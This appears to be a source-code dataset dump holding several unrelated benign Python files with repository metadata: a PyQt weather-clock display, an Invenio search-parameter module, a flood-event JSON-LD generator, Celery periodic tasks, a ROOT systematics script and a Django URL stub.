except AttributeError:
Config.weather_refresh = 30 # minutes
try:
Config.radar_refresh
except AttributeError:
Config.radar_refresh = 10 # minutes
try:
Config.fontattr
except AttributeError:
Config.fontattr = ''
try:
Config.dimcolor
except AttributeError:
Config.dimcolor = QColor('#000000')
Config.dimcolor.setAlpha(0)
try:
Config.DateLocale
except AttributeError:
Config.DateLocale = ''
try:
Config.wind_degrees
except AttributeError:
Config.wind_degrees = 0
try:
Config.satellite
except AttributeError:
Config.satellite = 0
try:
Config.digital
except AttributeError:
Config.digital = 0
try:
Config.LPressure
except AttributeError:
Config.wuLanguage = "EN"
Config.LPressure = "Pressure "
Config.LHumidity = "Humidity "
Config.LWind = "Wind "
Config.Lgusting = " gusting "
Config.LFeelslike = "Feels like "
Config.LPrecip1hr = " Precip 1hr:"
Config.LToday = "Today: "
Config.LSunRise = "Sun Rise:"
Config.LSet = " Set: "
Config.LMoonPhase = " Moon Phase:"
Config.LInsideTemp = "Inside Temp "
Config.LRain = " Rain: "
Config.LSnow = " Snow: "
#
lastmin = -1
lastday = -1
pdy = ""
lasttimestr = ""
weatherplayer = None
lastkeytime = 0
lastapiget = time.time()
app = QtGui.QApplication(sys.argv)
desktop = app.desktop()
rec = desktop.screenGeometry()
height = rec.height()
width = rec.width()
signal.signal(signal.SIGINT, myquit)
w = myMain()
w.setWindowTitle(os.path.basename(__file__))
w.setStyleSheet("QWidget { background-color: black;}")
# fullbgpixmap = QtGui.QPixmap(Config.background)
# fullbgrect = fullbgpixmap.rect()
# xscale = float(width)/fullbgpixmap.width()
# yscale = float(height)/fullbgpixmap.height()
xscale = float(width) / 1440.0
yscale = float(height) / 900.0
frames = []
framep = 0
frame1 = QtGui.QFrame(w)
frame1.setObjectName("frame1")
frame1.setGeometry(0, 0, width, height)
frame1.setStyleSheet("#frame1 { background-color: black; border-image: url(" +
Config.background + ") 0 0 0 0 stretch stretch;}")
frames.append(frame1)
frame2 = QtGui.QFrame(w)
frame2.setObjectName("frame2")
frame2.setGeometry(0, 0, width, height)
frame2.setStyleSheet("#frame2 { background-color: blue; border-image: url(" +
Config.background + ") 0 0 0 0 stretch stretch;}")
frame2.setVisible(False)
frames.append(frame2)
# frame3 = QtGui.QFrame(w)
# frame3.setObjectName("frame3")
# frame3.setGeometry(0,0,width,height)
# frame3.setStyleSheet("#frame3 { background-color: blue; border-image:
# url("+Config.background+") 0 0 0 0 stretch stretch;}")
# frame3.setVisible(False)
# frames.append(frame3)
squares1 = QtGui.QFrame(frame1)
squares1.setObjectName("squares1")
squares1.setGeometry(0, height - yscale * 600, xscale * 340, yscale * 600)
squares1.setStyleSheet(
"#squares1 { background-color: transparent; border-image: url(" +
Config.squares1 +
") 0 0 0 0 stretch stretch;}")
squares2 = QtGui.QFrame(frame1)
squares2.setObjectName("squares2")
squares2.setGeometry(width - xscale * 340, 0, xscale * 340, yscale * 900)
squares2.setStyleSheet(
"#squares2 { background-color: transparent; border-image: url(" +
Config.squares2 +
") 0 0 0 0 stretch stretch;}")
if not Config.digital:
clockface = QtGui.QFrame(frame1)
clockface.setObjectName("clockface")
clockrect = QtCore.QRect(
width / 2 - height * .4,
height * .45 - height * .4,
height * .8,
height * .8)
clockface.setGeometry(clockrect)
clockface.setStyleSheet(
"#clockface { background-color: transparent; border-image: url(" +
Config.clockface +
") 0 0 0 0 stretch stretch;}")
hourhand = QtGui.QLabel(frame1)
hourhand.setObjectName("hourhand")
hourhand.setStyleSheet("#hourhand { background-color: transparent; }")
minhand = QtGui.QLabel(frame1)
minhand.setObjectName("minhand")
minhand.setStyleSheet("#minhand { background-color: transparent; }")
sechand = QtGui.QLabel(frame1)
sechand.setObjectName("sechand")
sechand.setStyleSheet("#sechand { background-color: transparent; }")
hourpixmap = QtGui.QPixmap(Config.hourhand)
hourpixmap2 = QtGui.QPixmap(Config.hourhand)
minpixmap = QtGui.QPixmap(Config.minhand)
minpixmap2 = QtGui.QPixmap(Config.minhand)
secpixmap = QtGui.QPixmap(Config.sechand)
secpixmap2 = QtGui.QPixmap(Config.sechand)
else:
clockface = QtGui.QLabel(frame1)
clockface.setObjectName("clockface")
clockrect = QtCore.QRect(
width / 2 - height * .4,
height * .45 - height * .4,
height * .8,
height * .8)
clockface.setGeometry(clockrect)
dcolor = QColor(Config.digitalcolor).darker(0).name()
lcolor = QColor(Config.digitalcolor).lighter(120).name()
clockface.setStyleSheet(
"#clockface { background-color: transparent; font-family:sans-serif;" +
" font-weight: light; color: " +
lcolor +
"; background-color: transparent; font-size: " +
str(int(Config.digitalsize * xscale)) +
"px; " +
Config.fontattr +
"}")
clockface.setAlignment(Qt.AlignCenter)
clockface.setGeometry(clockrect)
glow = QtGui.QGraphicsDropShadowEffect()
glow.setOffset(0)
glow.setBlurRadius(50)
glow.setColor(QColor(dcolor))
clockface.setGraphicsEffect(glow)
radar1rect = QtCore.QRect(3 * xscale, 344 * yscale, 300 * xscale, 275 * yscale)
objradar1 = Radar(frame1, Config.radar1, radar1rect, "radar1")
radar2rect = QtCore.QRect(3 * xscale, 622 * yscale, 300 * xscale, 275 * yscale)
objradar2 = Radar(frame1, Config.radar2, radar2rect, "radar2")
radar3rect = QtCore.QRect(13 * xscale, 50 * yscale, 700 * xscale, 700 * yscale)
objradar3 = Radar(frame2, Config.radar3, radar3rect, "radar3")
radar4rect = QtCore.QRect(726 * xscale, 50 * yscale,
700 * xscale, 700 * yscale)
objradar4 = Radar(frame2, Config.radar4, radar4rect, "radar4")
datex = QtGui.QLabel(frame1)
datex.setObjectName("datex")
datex.setStyleSheet("#datex { font-family:sans-serif; color: " +
Config.textcolor +
"; background-color: transparent; font-size: " +
str(int(50 * xscale)) +
"px; " +
Config.fontattr +
"}")
datex.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
datex.setGeometry(0, 0, width, 100)
datex2 = QtGui.QLabel(frame2)
datex2.setObjectName("datex2")
datex2.setStyleSheet("#datex2 { font-family:sans-serif; color: " +
Config.textcolor +
"; background-color: transparent; font-size: " +
str(int(50 * xscale)) + "px; " +
Config.fontattr +
"}")
datex2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
datex2.setGeometry(800 * xscale, 780 * yscale, 640 * xscale, 100)
datey2 = QtGui.QLabel(frame2)
datey2.setObjectName("datey2")
datey2.setStyleSheet("#datey2 { font-family:sans-serif; color: " +
Config.textcolor +
"; background-color: transparent; font-size: " +
str(int(50 * xscale)) +
"px; " +
Config.fontattr +
"}")
datey2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
datey2.setGeometry(800 * xscale, 840 * yscale, 640 * xscale, 100)
ypos = -25
wxicon = QtGui.QLabel(frame1)
wxicon.setObjectName("wxicon")
wxicon.setStyleSheet("#wxicon { background-color: transparent; }")
wxicon.setGeometry(75 * xscale, ypos * yscale, 150 * xscale, 150 * yscale)
wxicon2 = QtGui.QLabel(frame2)
wxicon2.setObjectName("wxicon2")
wxicon2.setStyleSheet("#wxicon2 { background-color: transparent; }")
wxicon2.setGeometry(0 * xscale, 750 * yscale, 150 * xscale, 150 * yscale)
ypos += 130
wxdesc = QtGui.QLabel(frame1)
wxdesc.setObjectName("wxdesc")
wxdesc.setStyleSheet("#wxdesc { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(30 * xscale)) +
"px; " +
Config.fontattr +
"}")
wxdesc.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wxdesc.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
wxdesc2 = QtGui.QLabel(frame2)
wxdesc2.setObjectName("wxdesc2")
wxdesc2.setStyleSheet("#wxdesc2 { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(50 * xscale)) +
"px; " +
Config.fontattr +
"}")
wxdesc2.setAlignment(Qt.AlignLeft | Qt.AlignTop)
wxdesc2.setGeometry(400 * xscale, 800 * yscale, 400 * xscale, 100)
ypos += 25
temper = QtGui.QLabel(frame1)
temper.setObjectName("temper")
temper.setStyleSheet("#temper { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(70 * xscale)) +
"px; " +
Config.fontattr +
"}")
temper.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
temper.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
temper2 = QtGui.QLabel(frame2)
temper2.setObjectName("temper2")
temper2.setStyleSheet("#temper2 { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(70 * xscale)) +
"px; " +
Config.fontattr +
"}")
temper2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
temper2.setGeometry(125 * xscale, 780 * yscale, 300 * xscale, 100)
ypos += 80
press = QtGui.QLabel(frame1)
press.setObjectName("press")
press.setStyleSheet("#press { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(25 * xscale)) +
"px; " +
Config.fontattr +
"}")
press.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
press.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 30
humidity = QtGui.QLabel(frame1)
humidity.setObjectName("humidity")
humidity.setStyleSheet("#humidity { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(25 * xscale)) +
"px; " +
Config.fontattr +
"}")
humidity.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
humidity.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 30
wind = QtGui.QLabel(frame1)
wind.setObjectName("wind")
wind.setStyleSheet("#wind { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(20 * xscale)) +
"px; " +
Config.fontattr +
"}")
wind.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wind.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 20
wind2 = QtGui.QLabel(frame1)
wind2.setObjectName("wind2")
wind2.setStyleSheet("#wind2 { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(20 * xscale)) +
"px; " +
Config.fontattr +
"}")
wind2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wind2.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 20
wdate = QtGui.QLabel(frame1)
wdate.setObjectName("wdate")
wdate.setStyleSheet("#wdate { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(15 * xscale)) +
"px; " +
Config.fontattr +
"}")
wdate.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wdate.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
bottom = QtGui.QLabel(frame1)
bottom.setObjectName("bottom")
bottom.setStyleSheet("#bottom { font-family:sans-serif; color: " +
Config.textcolor +
"; background-color: transparent; font-size: " +
str(int(30 * xscale)) +
"px; " +
Config.fontattr +
"}")
bottom.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
bottom.setGeometry(0, height - 50, width, 50)
temp = QtGui.QLabel(frame1)
temp.setObjectName("temp")
temp.setStyleSheet("#temp { font-family:sans-serif; color: " +
Config.textcolor +
"; background-color: transparent; font-size: " +
str(int(30 * xscale)) +
"px; " +
Config.fontattr +
"}")
temp.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
temp.setGeometry(0, height - 100, width, 50)
forecast = []
for i in range(0, 9):
lab = QtGui.QLabel(frame1)
lab.setObjectName("forecast" + str(i))
lab.setStyleSheet("QWidget { background-color: transparent; color: " +
Config.textcolor +
"; font-size: " +
str(int(20 * xscale)) +
"px; " +
Config.fontattr +
"}")
lab.setGeometry(1137 * xscale, i * 100 * yscale,
300 * xscale, 100 * yscale)
icon = QtGui.QLabel(lab)
icon.setStyleSheet("#icon { background-color: transparent; }")
icon.setGeometry(0, 0, 100 * xscale, 100 * yscale)
icon.setObjectName("icon")
wx = QtGui.QLabel(lab)
wx.setStyleSheet("#wx { background-color: transparent; }")
wx.setGeometry(100 * xscale, 10 * yscale, 200 * xscale, 20 * yscale)
wx.setObjectName("wx")
wx2 = QtGui.QLabel(lab)
wx2.setStyleSheet("#wx2 { background-color: transparent; }")
wx2.setGeometry(100 * xscale, 30 * yscale, 200 * xscale, 100 * yscale)
wx2.setAlignment(Qt.AlignLeft | Qt.AlignTop)
wx2.setWordWrap(True)
wx2.setObjectName("wx2")
day = QtGui.QLabel(lab)
day.setStyleSheet("#day { background-color: transparent; }")
day.setGeometry(100 * xscale, 75 * yscale, 200 * xscale, 25 * yscale)
day.setAlignment(Qt.AlignRight | Qt.AlignBottom)
day.setObjectName("day")
forecast.append(lab)
manager = QtNetwork.QNetworkAccessManager()
# proxy = QNetworkProxy()
# proxy.setType(QNetworkProxy.HttpProxy)
# proxy.setHostName("localhost")
# proxy.setPort(8888)
# QNetworkProxy.setApplicationProxy(proxy)
stimer = QtCore.QTimer()
stimer.singleShot(10, qtstart)
# print radarurl(Config.radar1,radar1rect)
w.show()
w.showFullScreen()
sys.exit(app.exec_())
| 34.33704 | 150 | 0.555605 | 4,153 | 40,140 | 5.348904 | 0.152661 | 0.003421 | 0.036283 | 0.010084 | 0.329072 | 0.267669 | 0.245026 | 0.224858 | 0.205951 | 0.19042 | 0 | 0.030765 | 0.306029 | 40,140 | 1,168 | 151 | 34.366438 | 0.766334 | 0.04285 | 0 | 0.321897 | 0 | 0.001009 | 0.120394 | 0.01243 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004036 | 0.020182 | null | null | 0.012109 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c58a0d52b8cef211264dbb50ca9899b22373ef3 | 632 | py | Python | invenio_records_resources/services/records/params/__init__.py | jrcastro2/invenio-records-resources | a9760846080bfa1da4ed55c6f5b1f7bb96acd0b5 | [
"MIT"
] | null | null | null | invenio_records_resources/services/records/params/__init__.py | jrcastro2/invenio-records-resources | a9760846080bfa1da4ed55c6f5b1f7bb96acd0b5 | [
"MIT"
] | null | null | null | invenio_records_resources/services/records/params/__init__.py | jrcastro2/invenio-records-resources | a9760846080bfa1da4ed55c6f5b1f7bb96acd0b5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Search parameter interpreter API."""
from .base import ParamInterpreter
from .facets import FacetsParam
from .filter import FilterParam
from .pagination import PaginationParam
from .querystr import QueryParser, QueryStrParam
from .sort import SortParam
__all__ = (
'FacetsParam',
'FilterParam',
'PaginationParam',
'ParamInterpreter',
'QueryParser',
'QueryStrParam',
'SortParam',
)
| 23.407407 | 76 | 0.727848 | 71 | 632 | 6.422535 | 0.71831 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009579 | 0.174051 | 632 | 26 | 77 | 24.307692 | 0.863985 | 0.375 | 0 | 0 | 0 | 0 | 0.224543 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c5cf1c2f2bcf20985787c9b1a6a054234532e3c | 4,651 | py | Python | floodviz/linked_data_utils.py | USGS-VIZLAB/active-flood-viz | fff04a5703967969aa8d01a5f67fe95772ea4aec | [
"CC0-1.0"
] | 3 | 2021-04-16T04:24:40.000Z | 2022-02-11T22:17:14.000Z | floodviz/linked_data_utils.py | USGS-VIZLAB/active-flood-viz | fff04a5703967969aa8d01a5f67fe95772ea4aec | [
"CC0-1.0"
] | 22 | 2017-06-19T15:05:08.000Z | 2022-02-14T22:15:04.000Z | floodviz/linked_data_utils.py | USGS-VIZLAB/active-flood-viz | fff04a5703967969aa8d01a5f67fe95772ea4aec | [
"CC0-1.0"
] | 8 | 2017-06-19T13:59:23.000Z | 2017-07-10T20:40:10.000Z | from datetime import date
class LinkedData:
"""
Generates JSON-LD based on gages and the flood event.
"""
def __init__(self):
self.ld = self._blank_thing("WebSite")
self.ld.update({
"name": "Active flood visualization placeholder name",
"datePublished": str(date.today()),
"publisher": {
"@context": "http://schema.org",
"@type": "Organization",
"name": "U.S. Geological Survey",
"alternateName": "USGS"
},
})
self.gages = []
self.dates = {}
self.location = []
@staticmethod
def _blank_thing(typename):
"""
Make a blank thing of a type
:param typename: Typename for the thing
:return: Dict representing a blank thing
"""
return {
"@context": "http://schema.org",
"@type": typename,
}
def _location_str(self):
"""
Convert the bounding box for the event into a string.
:return: String representing the bounding box for the event
"""
l = "{},{} {},{}".format(self.location[0], self.location[1], self.location[2], self.location[3])
return l
def _assemble_event(self):
"""
Wrap the data on the event into a dictionary
:return: JSON-LD-like dict representing the event
"""
event = self._blank_thing("Event")
if self.location and self.dates:
event.update({
"@context": "http://schema.org",
"@type": "Event",
"name": "FLOOD EVENT NAME",
"startDate": self.dates['start'],
"endDate": self.dates['end'],
"location": {
"@context": "http://schema.org",
"@type": "Place",
"address": "null",
"geo": {
"@context": "http://schema.org",
"@type": "GeoShape",
"box": self._location_str(),
},
},
})
return event
def _assemble_gage(self, gage):
"""
Wrap an individual gage in a place
:param gage: the gage to be wrapped
:return: A dict representing the gage in json-ld format as a place
"""
g = self._blank_thing('Place')
geo = self._blank_thing('geoCoordinates')
geo.update({
"longitude": gage['dec_long_va'],
"latitude": gage['dec_lat_va']
})
g.update({
"address": "HUC:" + gage['huc_cd'],
"name": gage['station_nm'],
"branchCode": "SITE:"+gage['site_no'],
"geo": geo,
"additionalProperty": {
"huc_cd": gage['huc_cd'],
"site_no": gage['site_no']
}
})
return g
def _assemble_all_gages(self):
"""
Wrap up all the gages as places
:return: A list of dicts describing the gages
"""
gages_ld = []
if self.gages:
for gage in self.gages:
gages_ld.append(self._assemble_gage(gage))
return gages_ld
def set_page_name(self, name):
self.ld['name'] = name
def set_gages(self, gages):
"""
Sets the gages to be used
:param gages: list of dicts describing gages as output by `site_dict` in map_utils.
:return: None
"""
self.gages = gages
def set_dates(self, start, end):
"""
Sets the start and end dates of the flood event
:param start: Start date
:param end: End date
:return: None
"""
self.dates = {
"start": start,
"end": end
}
def set_location(self, bbox):
"""
Sets the bounding box of the event
:param bbox: array containing two pairs of coordinates
:return: None
"""
lon = [bbox[0], bbox[2]]
lat = [bbox[1], bbox[3]]
minlat = min(lat)
maxlat = max(lat)
minlon = min(lon)
maxlon = max(lon)
self.location = [minlat, minlon, maxlat, maxlon]
def assemble(self):
"""
Put together all data
:return: return a JSON-LD-like dictionary
"""
self.ld['about'] = self._assemble_event()
self.ld['gages'] = []
if self.gages:
gages = self._assemble_all_gages()
for g in gages:
self.ld['gages'].append(g)
return self.ld
| 29.624204 | 104 | 0.488927 | 493 | 4,651 | 4.505071 | 0.27789 | 0.043224 | 0.038271 | 0.045025 | 0.076542 | 0.022512 | 0 | 0 | 0 | 0 | 0 | 0.002805 | 0.386799 | 4,651 | 156 | 105 | 29.814103 | 0.775947 | 0.212427 | 0 | 0.114583 | 1 | 0 | 0.171084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114583 | false | 0 | 0.010417 | 0 | 0.197917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c67075d9a02f5436a7386d8c0f32d76899c0dc6 | 1,342 | py | Python | src/prodstats/cq/__init__.py | la-mar/prodstats | 4ff5a6e0b0d6152af2d7e1f3844ede2d33ad4824 | [
"MIT"
] | null | null | null | src/prodstats/cq/__init__.py | la-mar/prodstats | 4ff5a6e0b0d6152af2d7e1f3844ede2d33ad4824 | [
"MIT"
] | null | null | null | src/prodstats/cq/__init__.py | la-mar/prodstats | 4ff5a6e0b0d6152af2d7e1f3844ede2d33ad4824 | [
"MIT"
] | 1 | 2021-01-05T18:58:08.000Z | 2021-01-05T18:58:08.000Z | # flake8: noqa
import functools
import logging
from celery.schedules import crontab
import config as conf
import cq.signals
import cq.tasks as tasks
import db
import loggers
from const import HoleDirection, IHSPath
from cq.worker import celery_app
logger = logging.getLogger(__name__)
@celery_app.on_after_configure.connect
def setup_periodic_tasks(sender, **kwargs):
add_task = functools.partial(sender.add_periodic_task)
add_task(30, tasks.post_heartbeat.s(), name="heartbeat")
# add_task(15, tasks.log.s(), name="log-check")
add_task(
crontab(minute=50, hour="*/3"),
tasks.sync_area_manifest.s(),
name="sync_area_manifest",
)
# add_task(60, tasks.run_driftwood.s(HoleDirection.H), name="run_driftwood_h")
# add_task(
# 60, tasks.run_driftwood.s(HoleDirection.V, batch_size=2), name="run_driftwood_v"
# )
add_task(
crontab(minute=0, hour="*/1"),
# 15,
tasks.run_next_available.s(HoleDirection.H),
name="run_next_h",
)
# add_task(
# crontab(minute=30, hour="*/2"),
# tasks.run_next_available.s(HoleDirection.V, batch_size=2),
# name="run_next_v",
# )
add_task(
crontab(minute=0, hour=4),
tasks.sync_known_entities.s(HoleDirection.H),
name="sync_known_entities_h",
)
| 26.84 | 90 | 0.670641 | 184 | 1,342 | 4.63587 | 0.358696 | 0.073857 | 0.065651 | 0.093787 | 0.297773 | 0.279015 | 0.213365 | 0.152403 | 0 | 0 | 0 | 0.021475 | 0.201937 | 1,342 | 49 | 91 | 27.387755 | 0.774977 | 0.275708 | 0 | 0.1 | 0 | 0 | 0.066736 | 0.021898 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.333333 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c6c2c785d2c2f358098daac5406d05ec819f892 | 6,030 | py | Python | zprime_search/python/Systematics.py | cdragoiu/particle_physics | 1814ea2f072ccfbf1412397b19a3b5dad7ddb639 | [
"MIT"
] | null | null | null | zprime_search/python/Systematics.py | cdragoiu/particle_physics | 1814ea2f072ccfbf1412397b19a3b5dad7ddb639 | [
"MIT"
] | null | null | null | zprime_search/python/Systematics.py | cdragoiu/particle_physics | 1814ea2f072ccfbf1412397b19a3b5dad7ddb639 | [
"MIT"
] | null | null | null | import math, ROOT, sys
from PlotStyle import *
# estimate systematics -----------------------------------------------------------------------------
def GetSys(basePath, baseRunType, sysPath, sysRunType, N, ybin):
if 'ele' in baseRunType:
data = 'DoubleElectron'
elif 'hf' in baseRunType:
data = 'SingleElectron'
dirs = []
for i in range(N):
if 'pdf' in sysRunType:
dirs.append(sysRunType + '_' + str(i+1) + '/')
else:
dirs.append(sysRunType + '_max_' + str(i+1) + '/')
dirs.append(sysRunType + '_min_' + str(i+1) + '/')
if N == 0:
dirs.append('')
histName = 'afb_' + ybin + '_noBkg_unf'
fileB = ROOT.TFile.Open(basePath + 'histograms_' + baseRunType + '_' + data + '.root')
histB = fileB.Get(histName)
histP = histB.Clone('histP')
histP.Reset()
histM = histB.Clone('histM')
histM.Reset()
file = ROOT.TFile.Open(sysPath + 'histograms_' + sysRunType + '_' + data + '.root')
if 'sysNnpdf' in sysRunType:
hists = []
for b in range(2, histB.GetNbinsX()):
hists.append(ROOT.TH1D('sys_'+str(b), '', 1000, -0.5, 0.5))
for dir in dirs:
hist = file.Get(dir + histName)
hist.Add(histB, -1.0)
for b in range(2, histB.GetNbinsX()):
hists[b-2].Fill(hist.GetBinContent(b))
for b in range(2, histB.GetNbinsX()):
sys = hists[b-2].GetRMS()
histP.SetBinContent(b, sys)
histM.SetBinContent(b, -sys)
else:
for dir in dirs:
hist = file.Get(dir + histName)
hist.Add(histB, -1.0)
for b in range(2, histB.GetNbinsX()):
sys = hist.GetBinContent(b)
if sys > 0.0:
sysP = histP.GetBinContent(b)
histP.SetBinContent(b, math.sqrt(math.pow(sysP,2)+math.pow(sys,2)))
else:
sysM = histM.GetBinContent(b)
histM.SetBinContent(b, -math.sqrt(math.pow(sysM,2)+math.pow(sys,2)))
file.Close()
if 'sysCt10pdf' in sysRunType:
for b in range(2, histB.GetNbinsX()):
sys = (histP.GetBinContent(b) - histM.GetBinContent(b)) / 2
histP.SetBinContent(b, sys)
histM.SetBinContent(b, -sys)
for b in range(2, histB.GetNbinsX()):
sysP = histP.GetBinContent(b)
sysM = histM.GetBinContent(b)
if -sysM < 0.5*sysP:
histM.SetBinContent(b, -sysP)
elif sysP < -0.5*sysM:
histP.SetBinContent(b, -sysM)
fileS = ROOT.TFile.Open(sysPath + 'systematics_' + sysRunType + '.root', 'update')
fileS.cd()
histP.Write('sys_max_' + ybin, 6)
histM.Write('sys_min_' + ybin, 6)
fileS.Close()
fileB.Close()
# plot systematics ---------------------------------------------------------------------------------
def PlotSys(basePath, baseRunType, sysPath, sysRunType, ybin):
if 'ele' in baseRunType:
data = 'DoubleElectron'
xmax = 2000.0
lx1 = 0.4
elif 'hf' in baseRunType:
data = 'SingleElectron'
xmax = 320.0
lx1 = 0.1
fileB = ROOT.TFile.Open(basePath + 'histograms_' + baseRunType + '_' + data + '.root')
histB = fileB.Get('afb_' + ybin + '_noBkg_unf')
histErrP = histB.Clone('histErrP')
histErrM = histB.Clone('histErrM')
for b in range(2, histB.GetNbinsX()):
err = histB.GetBinError(b)
histErrP.SetBinContent(b, err)
histErrM.SetBinContent(b, -err)
fileS = ROOT.TFile.Open(sysPath + 'systematics_' + sysRunType + '.root')
histP = fileS.Get('sys_max_' + ybin)
histM = fileS.Get('sys_min_' + ybin)
canvas = ROOT.TCanvas('canvas', '', 440, 130, GetW(), GetH('S'))
SetCanvas(canvas, 'S')
canvas.SetLogx()
ROOT.gStyle.SetHistMinimumZero()
for hist in [histErrP, histErrM, histP, histM]:
hist.SetBarWidth(1.0)
hist.SetBarOffset(0.0)
hist.GetXaxis().SetRangeUser(40.0, xmax)
for hist in [histErrP, histErrM]:
hist.SetFillColor(ROOT.kGray)
hist.SetFillStyle(1001)
for hist in [histP, histM]:
hist.SetFillColor(ROOT.kRed)
hist.SetFillStyle(3001)
histErrP.SetStats(0)
histErrP.Draw('hist bar')
for hist in [histErrM, histP, histM]:
hist.Draw('same hist bar')
histErrP.Draw('same axis')
SetAxes(histErrP, 'S')
histErrP.GetXaxis().SetTitle('M(ee)')
ymax = 1.5 * max(histErrP.GetMaximum(), -histErrM.GetMinimum())
histErrP.GetYaxis().SetRangeUser(-ymax, ymax)
legendErr = ROOT.TLegend(lx1, 0.02, lx1+0.08, 0.08)
SetLegend(legendErr, 'S')
legendErr.AddEntry(histErrP, ' STAT', 'f')
legendErr.Draw('same')
legend = ROOT.TLegend(lx1+0.12, 0.02, lx1+0.20, 0.08)
SetLegend(legend, 'S')
legend.AddEntry(histP, ' SYS', 'f')
legend.Draw('same')
canvas.Update()
raw_input('...')
# run as the main program only ---------------------------------------------------------------------
if __name__ == '__main__':
if len(sys.argv) not in [6,7]:
cmd = sys.argv[0]
print 'usage:'
print ' get SYS : ' + cmd + ' basePath baseRunType sysPath sysRunType iterations ybin'
print ' plot SYS: ' + cmd + ' basePath baseRunType sysPath sysRunType ybin'
print ' basePath = path to base histograms'
print ' baseRunType = runZprime runType list (NO qcd, unf)'
print ' sysPath = path to systematic histograms'
print ' sysRunType = runZprime runType list (NO qcd, unf)'
print ' iterations = number of systematic variations'
print ' ybin = 0y1, 1y1p25, 1p25y1p5, 1p5y2p4, 2p4y5'
sys.exit()
if len(sys.argv) == 7:
GetSys(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], int(sys.argv[5]), sys.argv[6])
else:
PlotSys(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
| 41.586207 | 100 | 0.550415 | 708 | 6,030 | 4.635593 | 0.241525 | 0.02986 | 0.012797 | 0.023461 | 0.353748 | 0.319013 | 0.253199 | 0.19287 | 0.106033 | 0.106033 | 0 | 0.031414 | 0.271476 | 6,030 | 144 | 101 | 41.875 | 0.715684 | 0.049088 | 0 | 0.253623 | 0 | 0 | 0.148866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.014493 | null | null | 0.065217 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c6f6066b3c7cb622e5718a9e9136600fd2f5a6b | 375 | py | Python | src/api/urls.py | rjuppa/onepip | dd8de82ba58f5f192792fa21b466f9726227e0c5 | [
"MIT"
] | null | null | null | src/api/urls.py | rjuppa/onepip | dd8de82ba58f5f192792fa21b466f9726227e0c5 | [
"MIT"
] | null | null | null | src/api/urls.py | rjuppa/onepip | dd8de82ba58f5f192792fa21b466f9726227e0c5 | [
"MIT"
] | null | null | null | from django.conf.urls import url, include
from rest_framework import routers
from . import views
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
